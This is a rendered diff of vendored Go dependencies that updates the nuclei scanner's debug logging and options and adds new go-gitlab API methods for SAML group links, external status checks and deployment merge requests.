26	26		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/responsehighlighter"
	27	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
27	28		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/dns"
28	29		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/network/networkclientpool"
29	30		templateTypes "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
		skipped 99 lines
129	130		values := generators.MergeMaps(payloadValues, hostnameVariables)
130	131		variablesMap := request.options.Variables.Evaluate(values)
131	132		payloadValues = generators.MergeMaps(variablesMap, payloadValues)
	133	+
	134	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
	135	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(payloadValues))
	136	+	}
132	137
133	138		finalAddress, dataErr := expressions.EvaluateByte([]byte(request.Address), payloadValues)
134	139		if dataErr != nil {
		skipped 206 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/websocket/websocket.go

		skipped 26 lines
27	27		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/generators"
28	28		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/eventcreator"
29	29		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/responsehighlighter"
	30	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
30	31		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/network/networkclientpool"
31	32		templateTypes "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
32	33		"github.com/projectdiscovery/nuclei/v2/pkg/types"
		skipped 172 lines
205	206		Timeout: time.Duration(requestOptions.Options.Timeout) * time.Second,
206	207		NetDial: request.dialer.Dial,
207	208		TLSConfig: tlsConfig,
	209	+	}
	210	+
	211	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
	212	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(payloadValues))
208	213		}
209	214
210	215		finalAddress, dataErr := expressions.EvaluateByte([]byte(request.Address), payloadValues)
		skipped 201 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/whois/whois.go

		skipped 17 lines
18	18		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/eventcreator"
19	19		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/responsehighlighter"
20	20		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer"
	21	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
21	22		templateTypes "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
22	23		"github.com/projectdiscovery/nuclei/v2/pkg/types"
23	24		)
		skipped 64 lines
88	89		func (request *Request) ExecuteWithResults(input string, dynamicValues, previous output.InternalEvent, callback protocols.OutputEventCallback) error {
89	90		// generate variables
90	91		variables := generateVariables(input)
	92	+
	93	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
	94	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(variables))
	95	+	}
	96	+
91	97		// and replace placeholders
92	98		query := replacer.Replace(request.Query, variables)
93	99		// build an rdap request
		skipped 108 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/reporting/dedupe/dedupe.go

		skipped 5 lines
6	6
7	7		import (
8	8		"crypto/sha1"
9		-	"io/ioutil"
10	9		"os"
11	10		"reflect"
12	11		"unsafe"
		skipped 17 lines
30	29
31	30		var err error
32	31		if dbPath == "" {
33		-	dbPath, err = ioutil.TempDir("", "nuclei-report-*")
	32	+	dbPath, err = os.MkdirTemp("", "nuclei-report-*")
34	33		storage.temporary = dbPath
35	34		}
36	35		if err != nil {
		skipped 79 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/es/elasticsearch.go

		skipped 6 lines
7	7		"encoding/json"
8	8		"fmt"
9	9		"io"
10		-	"io/ioutil"
11	10		"net/http"
12	11		"time"
13	12
		skipped 97 lines
111	110		if err != nil {
112	111		return err
113	112		}
114		-	req.Body = ioutil.NopCloser(bytes.NewReader(b))
	113	+	req.Body = io.NopCloser(bytes.NewReader(b))
115	114
116	115		res, err := exporter.elasticsearch.Do(req)
117	116		if err != nil {
		skipped 19 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/markdown/markdown.go

		skipped 1 lines
2	2
3	3		import (
4	4		"bytes"
5		-	"io/ioutil"
6	5		"os"
7	6		"path/filepath"
8	7		"strings"
		skipped 58 lines
67	66		dataBuilder.WriteString(description)
68	67		data := dataBuilder.Bytes()
69	68
70		-	return ioutil.WriteFile(filepath.Join(exporter.directory, finalFilename), data, 0644)
	69	+	return os.WriteFile(filepath.Join(exporter.directory, finalFilename), data, 0644)
71	70		}
72	71
73	72		// Close closes the exporter after operation
		skipped 11 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/types/types.go

		skipped 142 lines
143	143		UseInstalledChrome bool
144	144		// SystemResolvers enables override of nuclei's DNS client opting to use system resolver stack.
145	145		SystemResolvers bool
	146	+	// ShowActions displays a list of all headless actions
	147	+	ShowActions bool
146	148		// Metrics enables display of metrics via an http endpoint
147	149		Metrics bool
148	150		// Debug mode allows debugging request/responses for the engine
		skipped 79 lines
228	230		DisableRedirects bool
229	231		// SNI custom hostname
230	232		SNI string
	233	+	// Interface to use for network scan
	234	+	Interface string
	235	+	// SourceIP sets custom source IP address for network requests
	236	+	SourceIP string
231	237		// Health Check
232	238		HealthCheck bool
233	239		// Time to wait between each input read operation before closing the stream
234	240		InputReadTimeout time.Duration
235	241		// Disable stdin for input processing
236	242		DisableStdin bool
	243	+	// IncludeConditions is the list of conditions templates should match
	244	+	IncludeConditions goflags.FileStringSlice
	245	+	// Custom Config Directory
	246	+	CustomConfigDir string
237	247		}
238	248
239	249		func (options *Options) AddVarPayload(key string, value interface{}) {
		skipped 35 lines

vendor/github.com/projectdiscovery/wappalyzergo/fingerprints_data.go

Unable to diff as some line is too long.

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/deployments_merge_requests.go

1	+	//
2	+	// Copyright 2022, Daniela Filipe Bento
3	+	//
4	+	// Licensed under the Apache License, Version 2.0 (the "License");
5	+	// you may not use this file except in compliance with the License.
6	+	// You may obtain a copy of the License at
7	+	//
8	+	// http://www.apache.org/licenses/LICENSE-2.0
9	+	//
10	+	// Unless required by applicable law or agreed to in writing, software
11	+	// distributed under the License is distributed on an "AS IS" BASIS,
12	+	// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13	+	// See the License for the specific language governing permissions and
14	+	// limitations under the License.
15	+	package gitlab
16	+
17	+	import (
18	+	"fmt"
19	+	"net/http"
20	+	)
21	+
22	+	// DeploymentMergeRequestsService handles communication with the deployment's
23	+	// merge requests related methods of the GitLab API.
24	+	//
25	+	// GitLab API docs:
26	+	// https://docs.gitlab.com/ee/api/deployments.html#list-of-merge-requests-associated-with-a-deployment
27	+	type DeploymentMergeRequestsService struct {
28	+	client *Client
29	+	}
30	+
31	+	// ListDeploymentMergeRequests get the merge requests associated with deployment.
32	+	//
33	+	// GitLab API docs:
34	+	// https://docs.gitlab.com/ee/api/deployments.html#list-of-merge-requests-associated-with-a-deployment
35	+	func (s DeploymentMergeRequestsService) ListDeploymentMergeRequests(pid interface{}, deployment int, opts ListMergeRequestsOptions, options ...RequestOptionFunc) ([]MergeRequest, Response, error) {
36	+	project, err := parseID(pid)
37	+	if err != nil {
38	+	return nil, nil, err
39	+	}
40	+	u := fmt.Sprintf("projects/%s/deployments/%d/merge_requests", PathEscape(project), deployment)
41	+
42	+	req, err := s.client.NewRequest(http.MethodGet, u, opts, options)
43	+	if err != nil {
44	+	return nil, nil, err
45	+	}
46	+
47	+	var mrs []*MergeRequest
48	+	resp, err := s.client.Do(req, &mrs)
49	+	if err != nil {
50	+	return nil, resp, err
51	+	}
52	+
53	+	return mrs, resp, err
54	+	}
55	+

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/epics.go

		skipped 210 lines
211	211		// GitLab API docs: https://docs.gitlab.com/ee/api/epics.html#update-epic
212	212		type UpdateEpicOptions struct {
213	213		Title *string `url:"title,omitempty" json:"title,omitempty"`
	214	+	Confidential *bool `url:"confidential,omitempty" json:"confidential,omitempty"`
214	215		Description *string `url:"description,omitempty" json:"description,omitempty"`
215	216		Labels *Labels `url:"labels,comma,omitempty" json:"labels,omitempty"`
216	217		StartDateIsFixed *bool `url:"start_date_is_fixed,omitempty" json:"start_date_is_fixed,omitempty"`
		skipped 49 lines

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/event_webhook_types.go

		skipped 22 lines
23	23		"time"
24	24		)
25	25
26		-	//BuildEvent represents a build event
	26	+	// BuildEvent represents a build event.
27	27		//
28	28		// GitLab API docs:
29	29		// https://docs.gitlab.com/ce/user/project/integrations/webhooks.html#build-events
		skipped 164 lines
194	194		Attachment string `json:"attachment"`
195	195		LineCode string `json:"line_code"`
196	196		CommitID string `json:"commit_id"`
	197	+	DiscussionID string `json:"discussion_id"`
197	198		NoteableID int `json:"noteable_id"`
198	199		System bool `json:"system"`
199	200		StDiff []*Diff `json:"st_diff"`
		skipped 320 lines
520	521		Email string `json:"email"`
521	522		} `json:"author"`
522	523		} `json:"last_commit"`
523		-	WorkInProgress bool `json:"work_in_progress"`
524		-	URL string `json:"url"`
525		-	Action string `json:"action"`
526		-	OldRev string `json:"oldrev"`
527		-	Assignee *EventUser `json:"assignee"`
	524	+	BlockingDiscussionsResolved bool `json:"blocking_discussions_resolved"`
	525	+	WorkInProgress bool `json:"work_in_progress"`
	526	+	URL string `json:"url"`
	527	+	Action string `json:"action"`
	528	+	OldRev string `json:"oldrev"`
	529	+	Assignee *EventUser `json:"assignee"`
528	530		} `json:"object_attributes"`
529	531		Repository *Repository `json:"repository"`
530	532		Assignee *EventUser `json:"assignee"`
		skipped 474 lines

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/external_status_checks.go

		skipped 63 lines
64	64		return mscs, resp, err
65	65		}
66	66
	67	+	// SetExternalStatusCheckStatusOptions represents the available
	68	+	// SetExternalStatusCheckStatus() options.
	69	+	//
	70	+	// GitLab API docs:
	71	+	// https://docs.gitlab.com/ee/api/status_checks.html#set-status-of-an-external-status-check
	72	+	type SetExternalStatusCheckStatusOptions struct {
	73	+	SHA *string `url:"sha,omitempty" json:"sha,omitempty"`
	74	+	ExternalStatusCheckID *int `url:"external_status_check_id,omitempty" json:"external_status_check_id,omitempty"`
	75	+	Status *string `url:"status,omitempty" json:"status,omitempty"`
	76	+	}
	77	+
	78	+	// SetExternalStatusCheckStatus sets the status of an external status check.
	79	+	//
	80	+	// Gitlab API docs:
	81	+	// https://docs.gitlab.com/ee/api/status_checks.html#set-status-of-an-external-status-check
	82	+	func (s ExternalStatusChecksService) SetExternalStatusCheckStatus(pid interface{}, mergeRequest int, opt SetExternalStatusCheckStatusOptions, options ...RequestOptionFunc) (*Response, error) {
	83	+	project, err := parseID(pid)
	84	+	if err != nil {
	85	+	return nil, err
	86	+	}
	87	+	u := fmt.Sprintf("projects/%s/merge_requests/%d/status_check_responses", PathEscape(project), mergeRequest)
	88	+
	89	+	req, err := s.client.NewRequest(http.MethodPost, u, opt, options)
	90	+	if err != nil {
	91	+	return nil, err
	92	+	}
	93	+
	94	+	return s.client.Do(req, nil)
	95	+	}
	96	+
67	97		// ListProjectStatusChecks lists the project external status checks.
68	98		//
69	99		// GitLab API docs:
		skipped 19 lines
89	119		return pscs, resp, err
90	120		}
91	121
	122	+	// CreateExternalStatusCheckOptions represents the available
	123	+	// CreateExternalStatusCheck() options.
	124	+	//
	125	+	// GitLab API docs:
	126	+	// https://docs.gitlab.com/ee/api/status_checks.html#create-external-status-check
	127	+	type CreateExternalStatusCheckOptions struct {
	128	+	Name *string `url:"name,omitempty" json:"name,omitempty"`
	129	+	ExternalURL *string `url:"external_url,omitempty" json:"external_url,omitempty"`
	130	+	ProtectedBranchIDs *[]int `url:"protected_branch_ids,omitempty" json:"protected_branch_ids,omitempty"`
	131	+	}
	132	+
	133	+	// CreateExternalStatusCheck creates an external status check.
	134	+	//
	135	+	// Gitlab API docs:
	136	+	// https://docs.gitlab.com/ee/api/status_checks.html#create-external-status-check
	137	+	func (s ExternalStatusChecksService) CreateExternalStatusCheck(pid interface{}, opt CreateExternalStatusCheckOptions, options ...RequestOptionFunc) (*Response, error) {
	138	+	project, err := parseID(pid)
	139	+	if err != nil {
	140	+	return nil, err
	141	+	}
	142	+	u := fmt.Sprintf("projects/%s/external_status_checks", PathEscape(project))
	143	+
	144	+	req, err := s.client.NewRequest(http.MethodPost, u, opt, options)
	145	+	if err != nil {
	146	+	return nil, err
	147	+	}
	148	+
	149	+	return s.client.Do(req, nil)
	150	+	}
	151	+
	152	+	// DeleteExternalStatusCheck deletes an external status check.
	153	+	//
	154	+	// Gitlab API docs:
	155	+	// https://docs.gitlab.com/ee/api/status_checks.html#delete-external-status-check
	156	+	func (s ExternalStatusChecksService) DeleteExternalStatusCheck(pid interface{}, check int, options ...RequestOptionFunc) (Response, error) {
	157	+	project, err := parseID(pid)
	158	+	if err != nil {
	159	+	return nil, err
	160	+	}
	161	+	u := fmt.Sprintf("projects/%s/external_status_checks/%d", PathEscape(project), check)
	162	+
	163	+	req, err := s.client.NewRequest(http.MethodDelete, u, nil, options)
	164	+	if err != nil {
	165	+	return nil, err
	166	+	}
	167	+
	168	+	return s.client.Do(req, nil)
	169	+	}
	170	+
	171	+	// UpdateExternalStatusCheckOptions represents the available
	172	+	// UpdateExternalStatusCheck() options.
	173	+	//
	174	+	// GitLab API docs:
	175	+	// https://docs.gitlab.com/ee/api/status_checks.html#update-external-status-check
	176	+	type UpdateExternalStatusCheckOptions struct {
	177	+	Name *string `url:"name,omitempty" json:"name,omitempty"`
	178	+	ExternalURL *string `url:"external_url,omitempty" json:"external_url,omitempty"`
	179	+	ProtectedBranchIDs *[]int `url:"protected_branch_ids,omitempty" json:"protected_branch_ids,omitempty"`
	180	+	}
	181	+
	182	+	// UpdateExternalStatusCheck updates an external status check.
	183	+	//
	184	+	// Gitlab API docs:
	185	+	// https://docs.gitlab.com/ee/api/status_checks.html#update-external-status-check
	186	+	func (s ExternalStatusChecksService) UpdateExternalStatusCheck(pid interface{}, check int, opt UpdateExternalStatusCheckOptions, options ...RequestOptionFunc) (*Response, error) {
	187	+	project, err := parseID(pid)
	188	+	if err != nil {
	189	+	return nil, err
	190	+	}
	191	+	u := fmt.Sprintf("projects/%s/external_status_checks/%d", PathEscape(project), check)
	192	+
	193	+	req, err := s.client.NewRequest(http.MethodPut, u, opt, options)
	194	+	if err != nil {
	195	+	return nil, err
	196	+	}
	197	+
	198	+	return s.client.Do(req, nil)
	199	+	}
	200	+

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/gitlab.go

		skipped 114 lines
115	115		CustomAttribute *CustomAttributesService
116	116		DeployKeys *DeployKeysService
117	117		DeployTokens *DeployTokensService
	118	+	DeploymentMergeRequests *DeploymentMergeRequestsService
118	119		Deployments *DeploymentsService
119	120		Discussions *DiscussionsService
120	121		Environments *EnvironmentsService
		skipped 189 lines
310	311		c.Boards = &IssueBoardsService{client: c}
311	312		c.Branches = &BranchesService{client: c}
312	313		c.BroadcastMessage = &BroadcastMessagesService{client: c}
313		-	c.ClusterAgents = &ClusterAgentsService{client: c}
314	314		c.CIYMLTemplate = &CIYMLTemplatesService{client: c}
	315	+	c.ClusterAgents = &ClusterAgentsService{client: c}
315	316		c.Commits = &CommitsService{client: c}
316	317		c.ContainerRegistry = &ContainerRegistryService{client: c}
317	318		c.CustomAttribute = &CustomAttributesService{client: c}
318	319		c.DeployKeys = &DeployKeysService{client: c}
319	320		c.DeployTokens = &DeployTokensService{client: c}
	321	+	c.DeploymentMergeRequests = &DeploymentMergeRequestsService{client: c}
320	322		c.Deployments = &DeploymentsService{client: c}
321	323		c.Discussions = &DiscussionsService{client: c}
322	324		c.Environments = &EnvironmentsService{client: c}
		skipped 46 lines
369	371		c.PipelineTriggers = &PipelineTriggersService{client: c}
370	372		c.Pipelines = &PipelinesService{client: c}
371	373		c.PlanLimits = &PlanLimitsService{client: c}
372		-	c.ProjectBadges = &ProjectBadgesService{client: c}
373	374		c.ProjectAccessTokens = &ProjectAccessTokensService{client: c}
	375	+	c.ProjectBadges = &ProjectBadgesService{client: c}
374	376		c.ProjectCluster = &ProjectClustersService{client: c}
375	377		c.ProjectImportExport = &ProjectImportExportService{client: c}
376	378		c.ProjectIterations = &ProjectIterationsService{client: c}
		skipped 568 lines

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/group_hooks.go

		skipped 46 lines
47	47		CreatedAt *time.Time `json:"created_at"`
48	48		}
49	49
	50	+	// ListGroupHooksOptions represents the available ListGroupHooks() options.
	51	+	//
	52	+	// GitLab API docs: https://docs.gitlab.com/ce/api/groups.html#list-group-hooks
	53	+	type ListGroupHooksOptions ListOptions
	54	+
50	55		// ListGroupHooks gets a list of group hooks.
51	56		//
52	57		// GitLab API docs: https://docs.gitlab.com/ce/api/groups.html#list-group-hooks
53		-	func (s GroupsService) ListGroupHooks(gid interface{}, options ...RequestOptionFunc) ([]GroupHook, *Response, error) {
	58	+	func (s GroupsService) ListGroupHooks(gid interface{}, opt ListGroupHooksOptions, options ...RequestOptionFunc) ([]GroupHook, Response, error) {
54	59		group, err := parseID(gid)
55	60		if err != nil {
56	61		return nil, nil, err
57	62		}
58	63		u := fmt.Sprintf("groups/%s/hooks", PathEscape(group))
59	64
60		-	req, err := s.client.NewRequest(http.MethodGet, u, nil, options)
	65	+	req, err := s.client.NewRequest(http.MethodGet, u, opt, options)
61	66		if err != nil {
62	67		return nil, nil, err
63	68		}
		skipped 150 lines

■ ■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/groups.go

		skipped 51 lines
52	52		FileTemplateProjectID int `json:"file_template_project_id"`
53	53		ParentID int `json:"parent_id"`
54	54		Projects []*Project `json:"projects"`
55		-	Statistics *StorageStatistics `json:"statistics"`
	55	+	Statistics *Statistics `json:"statistics"`
56	56		CustomAttributes []*CustomAttribute `json:"custom_attributes"`
57	57		ShareWithGroupLock bool `json:"share_with_group_lock"`
58	58		RequireTwoFactorAuth bool `json:"require_two_factor_authentication"`
		skipped 16 lines
75	75		LDAPCN string `json:"ldap_cn"`
76	76		LDAPAccess AccessLevelValue `json:"ldap_access"`
77	77		LDAPGroupLinks []*LDAPGroupLink `json:"ldap_group_links"`
	78	+	SAMLGroupLinks []*SAMLGroupLink `json:"saml_group_links"`
78	79		SharedRunnersMinutesLimit int `json:"shared_runners_minutes_limit"`
79	80		ExtraSharedRunnersMinutesLimit int `json:"extra_shared_runners_minutes_limit"`
80	81		PreventForkingOutsideGroup bool `json:"prevent_forking_outside_group"`
		skipped 17 lines
98	99		Filter string `json:"filter"`
99	100		GroupAccess AccessLevelValue `json:"group_access"`
100	101		Provider string `json:"provider"`
	102	+	}
	103	+
	104	+	// SAMLGroupLink represents a GitLab SAML group link.
	105	+	//
	106	+	// GitLab API docs: https://docs.gitlab.com/ce/api/groups.html#saml-group-links
	107	+	type SAMLGroupLink struct {
	108	+	Name string `json:"name"`
	109	+	AccessLevel AccessLevelValue `json:"access_level"`
101	110		}
102	111
103	112		// ListGroupsOptions represents the available ListGroups() options.
		skipped 631 lines
735	744		PathEscape(provider),
736	745		PathEscape(cn),
737	746		)
	747	+
	748	+	req, err := s.client.NewRequest(http.MethodDelete, u, nil, options)
	749	+	if err != nil {
	750	+	return nil, err
	751	+	}
	752	+
	753	+	return s.client.Do(req, nil)
	754	+	}
	755	+
	756	+	// ListGroupSAMLLinks lists the group's SAML links. Available only for users who
	757	+	// can edit groups.
	758	+	//
	759	+	// GitLab API docs:
	760	+	// https://docs.gitlab.com/ee/api/groups.html#list-saml-group-links
	761	+	func (s GroupsService) ListGroupSAMLLinks(gid interface{}, options ...RequestOptionFunc) ([]SAMLGroupLink, *Response, error) {
	762	+	group, err := parseID(gid)
	763	+	if err != nil {
	764	+	return nil, nil, err
	765	+	}
	766	+	u := fmt.Sprintf("groups/%s/saml_group_links", PathEscape(group))
	767	+
	768	+	req, err := s.client.NewRequest(http.MethodGet, u, nil, options)
	769	+	if err != nil {
	770	+	return nil, nil, err
	771	+	}
	772	+
	773	+	var gl []*SAMLGroupLink
	774	+	resp, err := s.client.Do(req, &gl)
	775	+	if err != nil {
	776	+	return nil, resp, err
	777	+	}
	778	+
	779	+	return gl, resp, nil
	780	+	}
	781	+
	782	+	// GetGroupSAMLLink get a specific group SAML link. Available only for users who
	783	+	// can edit groups.
	784	+	//
	785	+	// GitLab API docs:
	786	+	// https://docs.gitlab.com/ee/api/groups.html#get-saml-group-link
	787	+	func (s GroupsService) GetGroupSAMLLink(gid interface{}, samlGroupName string, options ...RequestOptionFunc) (SAMLGroupLink, *Response, error) {
	788	+	group, err := parseID(gid)
	789	+	if err != nil {
	790	+	return nil, nil, err
	791	+	}
	792	+	u := fmt.Sprintf("groups/%s/saml_group_links/%s", PathEscape(group), PathEscape(samlGroupName))
	793	+
	794	+	req, err := s.client.NewRequest(http.MethodGet, u, nil, options)
	795	+	if err != nil {
	796	+	return nil, nil, err
	797	+	}
	798	+
	799	+	gl := new(SAMLGroupLink)
	800	+	resp, err := s.client.Do(req, &gl)
	801	+	if err != nil {
	802	+	return nil, resp, err
	803	+	}
	804	+
	805	+	return gl, resp, nil
	806	+	}
	807	+
	808	+	// AddGroupSAMLLinkOptions represents the available AddGroupSAMLLink() options.
	809	+	//
	810	+	// GitLab API docs:
	811	+	// https://docs.gitlab.com/ee/api/groups.html#add-saml-group-link
	812	+	type AddGroupSAMLLinkOptions struct {
	813	+	SAMLGroupName *string `url:"saml_group_name,omitempty" json:"saml_group_name,omitempty"`
	814	+	AccessLevel *AccessLevelValue `url:"access_level,omitempty" json:"access_level,omitempty"`
	815	+	}
	816	+
	817	+	// AddGroupSAMLLink creates a new group SAML link. Available only for users who
	818	+	// can edit groups.
	819	+	//
	820	+	// GitLab API docs:
	821	+	// https://docs.gitlab.com/ee/api/groups.html#add-saml-group-link
	822	+	func (s GroupsService) AddGroupSAMLLink(gid interface{}, opt AddGroupSAMLLinkOptions, options ...RequestOptionFunc) (SAMLGroupLink, Response, error) {
	823	+	group, err := parseID(gid)
	824	+	if err != nil {
	825	+	return nil, nil, err
	826	+	}
	827	+	u := fmt.Sprintf("groups/%s/saml_group_links", PathEscape(group))
	828	+
	829	+	req, err := s.client.NewRequest(http.MethodPost, u, opt, options)
	830	+	if err != nil {
	831	+	return nil, nil, err
	832	+	}
	833	+
	834	+	gl := new(SAMLGroupLink)
	835	+	resp, err := s.client.Do(req, &gl)
	836	+	if err != nil {
	837	+	return nil, resp, err
	838	+	}
	839	+
	840	+	return gl, resp, err
	841	+	}
	842	+
	843	+	// DeleteGroupSAMLLink deletes a group SAML link. Available only for users who
	844	+	// can edit groups.
	845	+	//
	846	+	// GitLab API docs:
	847	+	// https://docs.gitlab.com/ee/api/groups.html#delete-saml-group-link
	848	+	func (s GroupsService) DeleteGroupSAMLLink(gid interface{}, samlGroupName string, options ...RequestOptionFunc) (Response, error) {
	849	+	group, err := parseID(gid)
	850	+	if err != nil {
	851	+	return nil, err
	852	+	}
	853	+	u := fmt.Sprintf("groups/%s/saml_group_links/%s", PathEscape(group), PathEscape(samlGroupName))
738	854
739	855		req, err := s.client.NewRequest(http.MethodDelete, u, nil, options)
740	856		if err != nil {
		skipped 212 lines

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/issue_links.go

		skipped 44 lines
45	45		//
46	46		// GitLab API docs:
47	47		// https://docs.gitlab.com/ee/api/issue_links.html#list-issue-relations
48		-	func (s IssueLinksService) ListIssueRelations(pid interface{}, issueIID int, options ...RequestOptionFunc) ([]Issue, *Response, error) {
	48	+	func (s IssueLinksService) ListIssueRelations(pid interface{}, issue int, options ...RequestOptionFunc) ([]Issue, *Response, error) {
49	49		project, err := parseID(pid)
50	50		if err != nil {
51	51		return nil, nil, err
52	52		}
53		-	u := fmt.Sprintf("projects/%s/issues/%d/links", PathEscape(project), issueIID)
	53	+	u := fmt.Sprintf("projects/%s/issues/%d/links", PathEscape(project), issue)
54	54
55	55		req, err := s.client.NewRequest(http.MethodGet, u, nil, options)
56	56		if err != nil {
		skipped 9 lines
66	66		return is, resp, err
67	67		}
68	68
	69	+	// GetIssueLink gets a specific issue link.
	70	+	//
	71	+	// GitLab API docs:
	72	+	// https://docs.gitlab.com/ee/api/issue_links.html#get-an-issue-link
	73	+	func (s IssueLinksService) GetIssueLink(pid interface{}, issue, issueLink int, options ...RequestOptionFunc) (IssueLink, *Response, error) {
	74	+	project, err := parseID(pid)
	75	+	if err != nil {
	76	+	return nil, nil, err
	77	+	}
	78	+	u := fmt.Sprintf("projects/%s/issues/%d/links/%d", PathEscape(project), issue, issueLink)
	79	+
	80	+	req, err := s.client.NewRequest(http.MethodGet, u, nil, options)
	81	+	if err != nil {
	82	+	return nil, nil, err
	83	+	}
	84	+
	85	+	il := new(IssueLink)
	86	+	resp, err := s.client.Do(req, il)
	87	+	if err != nil {
	88	+	return nil, resp, err
	89	+	}
	90	+
	91	+	return il, resp, err
	92	+	}
	93	+
69	94		// CreateIssueLinkOptions represents the available CreateIssueLink() options.
70	95		//
71	96		// GitLab API docs: https://docs.gitlab.com/ee/api/issue_links.html
		skipped 8 lines
80	105		//
81	106		// GitLab API docs:
82	107		// https://docs.gitlab.com/ee/api/issue_links.html#create-an-issue-link
83		-	func (s IssueLinksService) CreateIssueLink(pid interface{}, issueIID int, opt CreateIssueLinkOptions, options ...RequestOptionFunc) (IssueLink, Response, error) {
	108	+	func (s IssueLinksService) CreateIssueLink(pid interface{}, issue int, opt CreateIssueLinkOptions, options ...RequestOptionFunc) (IssueLink, Response, error) {
84	109		project, err := parseID(pid)
85	110		if err != nil {
86	111		return nil, nil, err
87	112		}
88		-	u := fmt.Sprintf("projects/%s/issues/%d/links", PathEscape(project), issueIID)
	113	+	u := fmt.Sprintf("projects/%s/issues/%d/links", PathEscape(project), issue)
89	114
90	115		req, err := s.client.NewRequest(http.MethodPost, u, opt, options)
91	116		if err != nil {
		skipped 13 lines
105	130		//
106	131		// GitLab API docs:
107	132		// https://docs.gitlab.com/ee/api/issue_links.html#delete-an-issue-link
108		-	func (s IssueLinksService) DeleteIssueLink(pid interface{}, issueIID, issueLinkID int, options ...RequestOptionFunc) (IssueLink, *Response, error) {
	133	+	func (s IssueLinksService) DeleteIssueLink(pid interface{}, issue, issueLink int, options ...RequestOptionFunc) (IssueLink, *Response, error) {
109	134		project, err := parseID(pid)
110	135		if err != nil {
111	136		return nil, nil, err
112	137		}
113	138		u := fmt.Sprintf("projects/%s/issues/%d/links/%d",
114	139		PathEscape(project),
115		-	issueIID,
116		-	issueLinkID)
	140	+	issue,
	141	+	issueLink)
117	142
118	143		req, err := s.client.NewRequest(http.MethodDelete, u, nil, options)
119	144		if err != nil {
120	145		return nil, nil, err
121	146		}
122	147
123		-	i := new(IssueLink)
124		-	resp, err := s.client.Do(req, &i)
	148	+	il := new(IssueLink)
	149	+	resp, err := s.client.Do(req, &il)
125	150		if err != nil {
126	151		return nil, resp, err
127	152		}
128	153
129		-	return i, resp, err
	154	+	return il, resp, err
130	155		}
131	156

■ ■ ■ ■ ■ ■

vendor/github.com/xanzy/go-gitlab/projects.go

		skipped 120 lines
121	121		GroupName string `json:"group_name"`
122	122		GroupAccessLevel int `json:"group_access_level"`
123	123		} `json:"shared_with_groups"`
124		-	Statistics *ProjectStatistics `json:"statistics"`
	124	+	Statistics *Statistics `json:"statistics"`
125	125		Links *Links `json:"_links,omitempty"`
126	126		CIConfigPath string `json:"ci_config_path"`
127	127		CIDefaultGitDepth int `json:"ci_default_git_depth"`
		skipped 102 lines
230	230		WebURL string `json:"web_url"`
231	231		}
232	232
233		-	// ProjectStatistics represents a statistics record for a project.
234		-	type ProjectStatistics struct {
235		-	StorageStatistics
236		-	CommitCount int `json:"commit_count"`
237		-	}
238		-
239	233		// Repository represents a repository.
240	234		type Repository struct {
241	235		Name string `json:"name"`
		skipped 12 lines
254	248		HTTPURL string `json:"http_url"`
255	249		}
256	250
257		-	// StorageStatistics represents a statistics record for a group or project.
258		-	type StorageStatistics struct {
259		-	StorageSize int64 `json:"storage_size"`
260		-	RepositorySize int64 `json:"repository_size"`
261		-	LfsObjectsSize int64 `json:"lfs_objects_size"`
262		-	JobArtifactsSize int64 `json:"job_artifacts_size"`
	251	+	// Statistics represents a statistics record for a group or project.
	252	+	type Statistics struct {
	253	+	CommitCount int64 `json:"commit_count"`
	254	+	StorageSize int64 `json:"storage_size"`
	255	+	RepositorySize int64 `json:"repository_size"`
	256	+	WikiSize int64 `json:"wiki_size"`
	257	+	LFSObjectsSize int64 `json:"lfs_objects_size"`
	258	+	JobArtifactsSize int64 `json:"job_artifacts_size"`
	259	+	PipelineArtifactsSize int64 `json:"pipeline_artifacts_size"`
	260	+	PackagesSize int64 `json:"packages_size"`
	261	+	SnippetsSize int64 `json:"snippets_size"`
	262	+	UploadsSize int64 `json:"uploads_size"`
263	263		}
264	264
265	265		func (s Project) String() string {
		skipped 1702 lines

■ ■ ■ ■ ■ ■

vendor/golang.org/x/net/internal/socket/sys_zos_s390x.go

		skipped 4 lines
5	5		package socket
6	6
